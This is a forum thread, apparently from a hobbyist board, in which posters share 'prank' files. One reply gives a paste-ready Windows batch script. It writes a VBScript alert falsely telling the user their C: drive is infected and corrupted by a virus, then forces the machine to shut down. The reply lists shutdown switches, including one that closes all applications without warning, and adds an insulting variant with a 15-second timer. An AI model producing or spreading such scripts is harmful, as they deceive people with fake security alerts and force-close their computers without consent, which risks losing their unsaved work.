DONT BAN ME this is a funny prank lol here it is ps. i made it http://www.yousendit.com/transfer.php?acti...864FD4E44BB8549
It's alright... I mean.. you can do the same thing with a .bat file. I posted something about it this morning in General Discussion. Just that .bat doesn't do the loading Virus. Open up a note pad, or whatever text file you want. Paste this in @echo off title Error echo msgbox"Your C:\ Drive has been infected and curropted by a virus. Windows is shutting down to prevent total loss of data." >C:\1.vbs C:\1.vbs cls shutdown -s Edit whatever you want it to say between the " " You can add a crap load of other things. -s calls for a shut down (30 second timer) al though you can change the timer to however many seconds you want. Other commands available Useful commands for bat files: -l - Log off -s - Pain old shutdown -r - Restart -a - Abort Shutdown -f - Shutdown all applications without warning From that you can get something like this: @echo off title Hello echo msgbox"You and your computer are going down, you will regret being an asshole." >C:\1.vbs C:\1.vbs cls shutdown -s -t 15 -c "Goodbye." So simple Save as "filename.bat" and the file shouldn't be anymore than 1-2 kb. Something a little more simple yet just as effective.